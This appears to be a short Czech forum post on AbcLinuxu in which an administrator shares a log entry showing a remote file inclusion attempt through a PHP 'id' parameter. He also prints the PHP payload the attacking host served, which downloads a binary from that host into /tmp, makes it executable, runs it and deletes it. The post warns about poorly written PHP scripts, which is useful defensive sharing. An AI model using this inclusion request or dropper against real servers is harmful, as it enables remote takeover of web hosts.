Portál AbcLinuxu, 7. listopadu 2025 20:57
)
access.log:142.176.141.5 - - [12/Sep/2004:09:19:28 +0200] "GET /index.php?id=http://142.176.141.5:113/ HTTP/1.1" 200 1834
a tohle jsem zkusil:
-bash-2.05b# telnet 142.176.141.5 113
Trying 142.176.141.5...
Connected to 142.176.141.5.
Escape character is '^]'.
GET /
HTTP/1.1 200 OK
Date: Tue, 22 Jun 2004 22:23:39 GMT
Server: Apache
Last-Modified: Thu, 13 May 2004 17:24:53 GMT
Accept-Ranges: bytes
Content-Length: 314
Connection: close
Content-Type: text/plain
< ? passthru("killall -9 exe dsadas /tmp/dsadas"); \
@unlink("/tmp/dsadas"); $fd = fopen("/tmp/dsadas", "w"); \
if(!$fd) exit; $xx = fopen('http://142.176.141.5/tmp', 'rb');\
while($x=fread($xx, 10240)) fwrite($fd, $x); fclose($xx);\
fclose($fd); chmod("/tmp/dsadas", 0700); \
passthru("/tmp/dsadas;rm -f /tmp/dsadas"); ? >
Connection closed by foreign host.
-bash-2.05b#
tedy jedna se o to ze uzivatele maji blbe napsane php scripty
(
snad to nekomu pomuze
Tiskni
Sdílej:
ISSN 1214-1267, (c) 1999-2007 Stickfish s.r.o.